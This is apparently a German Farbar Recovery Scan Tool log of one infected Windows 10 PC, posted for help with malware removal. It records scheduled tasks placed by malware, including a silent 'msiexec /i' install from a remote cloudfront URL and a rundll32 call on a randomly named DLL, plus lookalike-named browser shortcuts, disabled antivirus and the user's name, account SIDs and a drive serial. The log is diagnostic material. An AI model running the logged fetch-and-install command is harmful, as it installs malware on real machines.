2017-02-13 19:12 - 2016-09-03 11:32 - 00000953 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Device Central CS3.lnk
2017-02-13 19:12 - 2016-09-03 11:32 - 00000890 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge CS3.lnk
2017-02-13 19:12 - 2016-07-30 09:48 - 00001886 _____ C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
2017-02-13 19:12 - 2016-07-30 08:18 - 00002429 _____ C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-13 19:12 - 2016-07-30 08:18 - 00001047 _____ C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Optionale Features.lnk
2017-02-13 19:12 - 2016-07-16 12:43 - 00002437 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk
2017-02-13 19:12 - 2016-07-16 12:43 - 00002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrintDialog.lnk
2017-02-13 19:12 - 2016-07-16 12:42 - 00002325 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiracastView.lnk
2017-02-12 22:24 - 2016-09-23 02:41 - 00000000 ____D C:\Users\Barbara
2017-02-12 22:15 - 2016-07-30 11:41 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\NVIDIA
2017-02-12 22:13 - 2016-07-30 13:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Witcher 2
2017-02-12 22:13 - 2016-07-30 09:02 - 00002028 ____R C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk
2017-02-12 22:12 - 2016-07-30 09:48 - 00000000 ____D C:\Users\Barbara\AppData\Local\Spotify
2017-02-12 20:33 - 2016-07-30 09:47 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Spotify
2017-02-12 20:33 - 2016-07-16 12:45 - 00000000 ____D C:\WINDOWS\INF
2017-02-11 12:51 - 2016-07-16 12:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-10 11:44 - 2016-07-16 12:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-09 13:39 - 2016-09-23 02:40 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-02-09 13:39 - 2016-07-30 09:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-02-09 13:38 - 2016-09-23 02:40 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-02-09 13:38 - 2016-09-23 02:40 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-02-09 13:38 - 2016-07-30 09:20 - 00000000 ____D C:\Users\Barbara\AppData\Local\NVIDIA Corporation
2017-02-03 17:19 - 2016-11-13 21:39 - 1291434677 _____ C:\WINDOWS\MEMORY.DMP
2017-02-03 17:19 - 2016-11-13 21:39 - 00000000 ____D C:\WINDOWS\Minidump
2017-02-03 17:19 - 2016-07-30 09:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-02-03 17:18 - 2016-07-30 10:12 - 00000000 ____D C:\ProgramData\Origin
2017-02-03 17:14 - 2016-07-30 09:57 - 00000000 ____D C:\Program Files (x86)\Steam
2017-02-03 17:13 - 2016-07-30 10:16 - 00000000 ____D C:\Users\Barbara\AppData\Local\Origin
2017-02-03 17:12 - 2016-10-13 07:34 - 00003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003884 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-10-13 07:34 - 00003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-02-03 17:12 - 2016-07-30 09:19 - 00000000 ____D C:\Users\Barbara\AppData\Local\NVIDIA
2017-01-25 13:43 - 2016-07-16 12:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-21 11:40 - 2016-07-30 08:18 - 00000000 ___RD C:\Users\Barbara\OneDrive
2017-01-20 19:39 - 2016-10-13 07:34 - 01872320 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01464768 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 01317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 00120256 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-01-20 19:39 - 2016-10-13 07:34 - 00046016 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-09-02 15:48 - 2016-10-11 12:28 - 0000337 _____ () C:\Users\Barbara\AppData\Roaming\2E7BF6-326E-4870-B5B1-B11758EC2B1D.ini

Einige Dateien in TEMP:
====================
2017-02-12 22:14 - 2017-02-12 22:14 - 1171283 _____ (                                                            ) C:\Users\Barbara\AppData\Local\Temp\4E1F.tmp.exe
2017-02-12 22:13 - 2017-02-12 22:13 - 0115900 _____ () C:\Users\Barbara\AppData\Local\Temp\load.exe
2016-10-13 07:34 - 2016-09-30 05:25 - 0950328 _____ (NVIDIA Corporation) C:\Users\Barbara\AppData\Local\Temp\NvTelemetry.dll
2016-10-13 07:34 - 2016-09-30 05:25 - 0198200 _____ (NVIDIA Corporation) C:\Users\Barbara\AppData\Local\Temp\NvTelemetryAPI32.dll
2016-10-13 07:34 - 2016-09-30 05:25 - 0242232 _____ (NVIDIA Corporation) C:\Users\Barbara\AppData\Local\Temp\NvTelemetryAPI64.dll

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-02-09 13:37

==================== Ende von FRST.txt ============================

--- --- ---

addition.txt

Zitat:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 12-02-2017
durchgeführt von Barbara (13-02-2017 20:48:27)
Gestartet von C:\Users\Barbara\Desktop\Virenscanner etc
Windows 10 Pro Version 1607 (X64) (2016-09-23 01:45:25)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-1500252791-3377746768-789393517-500 - Administrator - Disabled)
Barbara (S-1-5-21-1500252791-3377746768-789393517-1000 - Administrator - Enabled) => C:\Users\Barbara
DefaultAccount (S-1-5-21-1500252791-3377746768-789393517-503 - Limited - Disabled)
Gast (S-1-5-21-1500252791-3377746768-789393517-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1500252791-3377746768-789393517-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.023.20056 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Illustrator CS3 (HKLM-x32\...\Adobe_c015d5ef39552390a753ee735d16041) (Version: 13.0 - Adobe Systems Incorporated)
Ansel (Version: 368.81 - NVIDIA Corporation) Hidden
ARCHline 2015 15.0.1.239 (HKLM\...\{526F8F65-6A69-4683-AA88-42BB3321C625}_is1) (Version: - IT-Concept Software GmbH)
CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.0.2.18.20170123 - Landesfinanzdirektion Thüringen)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - )
Fliqlo Bildschirmschoner (HKLM-x32\...\Fliqlo) (Version: - )
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
LibreOffice 5.0.6.3 (HKLM-x32\...\{900D9036-4EDA-45EC-A095-E8AFB25D807A}) (Version: 5.0.6.3 - The Document Foundation)
Malwarebytes Version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Mein CEWE FOTOBUCH (HKLM-x32\...\Mein CEWE FOTOBUCH) (Version: 6.1.5 - CEWE Stiftung u Co. KGaA)
MFCDLL Shared Library - Retail Version (x32 Version: 6.0.8665.0 - Unknown) Hidden
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 51.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 de)) (Version: 51.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1.6234 - Mozilla)
NVIDIA 3D Vision Controller-Treiber 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.53 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.3.0.95 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.3.0.95 - NVIDIA Corporation)
NVIDIA Grafiktreiber 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.53 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.3.0.95 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.3.5.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
Origin (HKLM-x32\...\Origin) (Version: 9.12.1.43352 - Electronic Arts, Inc.)
PDF Settings (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.87.529.2014 - Realtek)
Revo Uninstaller 2.0.2 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.2 - VS Revo Group, Ltd.)
Sentinel System Driver Installer 7.5.7 (HKLM-x32\...\{B281C7D1-C088-40E0-86EA-B2D9D7E0810A}) (Version: 7.5.7 - SafeNet, Inc.)
SHIELD Streaming (Version: 7.1.0351 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.3.0.95 - NVIDIA Corporation) Hidden
SketchUp 2016 (HKLM\...\{6ECFED2E-6329-484A-9B08-14ED7F2D65BE}) (Version: 16.1.1449 - Trimble Navigation Limited)
Spotify (HKU\S-1-5-21-1500252791-3377746768-789393517-1000\...\Spotify) (Version: 1.0.45.186.g3b5036d6 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Witcher 2 Enhanced Edition Version 3.0 (HKLM-x32\...\The Witcher 2 Enhanced Edition_is1) (Version: 3.0 - CD Projekt RED)
VC User ATL71 RTL X86 --- (x32 Version: 1.0 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
WinRAR 5.31 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinSnare (HKLM-x32\...\{54A54A73-D8CF-4EBF-BEA7-AD6507ACE4C5}) (Version: 4.1.0 - WinSnare) <==== ACHTUNG

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {07D50CCA-2188-43A1-897B-EF2C5815E13F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-26] (Piriform Ltd)
Task: {08BC7C06-525E-43F2-B72E-DDCD9E7C4DD6} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe
Task: {1A3181DF-833E-436D-A30C-248F034B8623} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {1EA42CBF-EADD-4B00-81ED-2C40E4238B7C} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-01-20] (NVIDIA Corporation)
Task: {3024B4B3-FD37-477F-BA7A-04E9D557A0DF} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {358E9F01-B54F-4F1A-A590-566825F4CCF6} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {3782FA31-E821-4B7B-9FD3-1FC42377DBD5} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe
Task: {3A539CDD-D9FE-4485-BB5E-F119374C2E2B} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {3B7398CA-6B98-47E4-BFFB-FB8AEB3C62F8} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe
Task: {535076EF-9CD5-46BA-A7C8-10EEDDA703A2} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-01-20] (NVIDIA Corporation)
Task: {595ED7A0-ED76-4B70-9B39-AA80B04DC0D1} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {60FA74FF-6279-4ECD-9EA9-5DE73A58257E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe
Task: {71C58D38-8A13-46DD-8D3E-D7EDF04F9F41} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {74E7882B-EC43-4B32-87E6-E11EFB4D4BAA} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {82C50AED-8035-414F-9332-DE47AED14F1A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {82DEE0EB-4548-49CE-881E-34A0D3C76D71} - \OneDrive Standalone Update Task v2 -> Keine Datei <==== ACHTUNG
Task: {8621A79A-23F3-402E-B829-1B3C08FC23C6} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {8FEDA5A7-F6AE-459A-895E-3269F9B87DC5} - System32\Tasks\108l42A89c7603 => Rundll32.exe "C:\ProgramData\108l42A89c7603\108l42A89c7603.dll",lAcqxFh <==== ACHTUNG
Task: {917F73AC-B595-428F-9D7E-804DD4CA0B19} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Barbara\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {931E12E2-BA73-4859-AF12-777A31166AB5} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-01-20] (NVIDIA Corporation)
Task: {981171F7-EB47-47C7-9E26-7F1DE33B4C5E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe
Task: {9AF8C6A8-27BD-459C-A0B6-149FCF640506} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-01-20] (NVIDIA Corporation)
Task: {A23D98E2-25C7-4A4E-A93A-5277AAE5D6BD} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe
Task: {A9DC2516-E3BE-4B34-AE6A-49DECD192D48} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe
Task: {ABD44F90-CD20-4C95-AA96-464B6AEE71FE} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe
Task: {AED5C637-95A0-4DD0-ADC7-A4808E2FACE9} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe
Task: {B3737810-7B5B-49FA-ABF7-D2566CB7161D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {B73E6B94-97F6-4185-B265-5AF584ADD7C2} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {B8A37631-3077-4955-BA7D-5E165F4C4DB5} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe
Task: {BF709A57-E750-4DDD-B582-32B6C514637F} - \{7D0D0E47-797A-7F7A-7D11-7D797E041105} -> Keine Datei <==== ACHTUNG
Task: {C0F5AE71-6716-4F6C-ADC4-059DF01B35BA} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => %SystemRoot%\ehome\ehrec.exe
Task: {C1B4B136-C33D-4401-AED3-81D2C9151669} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {CF59DDC9-64FA-4592-BA4C-996DE144E956} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-01-20] (NVIDIA Corporation)
Task: {D15D9A6F-7B7C-46FF-B72E-989CE158ACF1} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {D20E72EA-E1B2-4FCA-90F2-94F73460A59C} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe
Task: {E3BEDC84-1FC4-462C-B3DA-C04B65228E1C} - System32\Tasks\Pregehabering => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=SamsungXSSDX840XEVOX250GB_S1DBNSBF263398Y&v=2017212 /q
Task: {ED9678EB-B078-4A94-A29D-89D8596AB858} - System32\Tasks\Atikationbogot System => C:\Program Files (x86)\Plidaing\drerzes.exe [2017-02-12] (Glarysoft Ltd)
Task: {EF1F752D-CA59-470C-BB1B-D66C885E54E5} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Intеrnеt Ехplоrеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnеt Ехplоrеr Вrоwsеr.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.bat (Keine Datei)
Shortcut: C:\Users\Barbara\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Моzillа Firеfох.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.bat (Keine Datei)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-23 02:40 - 2016-12-29 13:44 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-09-23 02:40 - 2013-07-04 02:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2017-02-13 20:42 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-02-13 20:42 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2017-02-13 20:42 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 07:34 - 2017-01-20 19:39 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-12-16 16:18 - 2016-12-09 11:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-23 03:38 - 2016-09-23 03:38 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 21:04 - 2016-12-21 08:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-01-10 20:59 - 2016-12-21 07:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 20:59 - 2016-12-21 07:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 20:59 - 2016-12-21 07:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-02-13 19:19 - 2017-02-13 19:19 - 00370176 _____ () C:\Program Files\PDR238V39I\22XHB7149.exe
2016-08-26 19:25 - 2016-08-26 19:25 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2017-02-13 20:19 - 2017-02-13 20:19 - 00370176 _____ () C:\Program Files\XPQ0UG79CA\XPQ0UG79C.exe
2017-01-23 11:41 - 2017-01-23 11:41 - 00055808 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11610.1001.25.0_x64__8wekyb3d8bbwe\WinStoreTasksWrapper.dll
2017-01-26 18:08 - 2017-01-26 18:09 - 02561536 _____ () C:\Program Files\WindowsApps\Microsoft.People_10.1.3410.0_x64__8wekyb3d8bbwe\People.BackgroundTasks.dll
2017-01-26 18:08 - 2017-01-26 18:09 - 00139264 _____ () C:\Program Files\WindowsApps\Microsoft.People_10.1.3410.0_x64__8wekyb3d8bbwe\PeopleUtilRT.Windows.dll
2017-01-10 20:59 - 2016-12-21 07:47 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll
2017-01-10 20:59 - 2016-12-21 07:47 - 00115712 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\DeviceSideServicesActionUriHandler.dll
2017-01-10 20:59 - 2016-12-21 07:47 - 00522752 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.NodeWinrtWrap.dll
2016-07-16 12:43 - 2016-07-16 23:56 - 00040448 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\winrt-projections\bin\Winrt_Projections.node
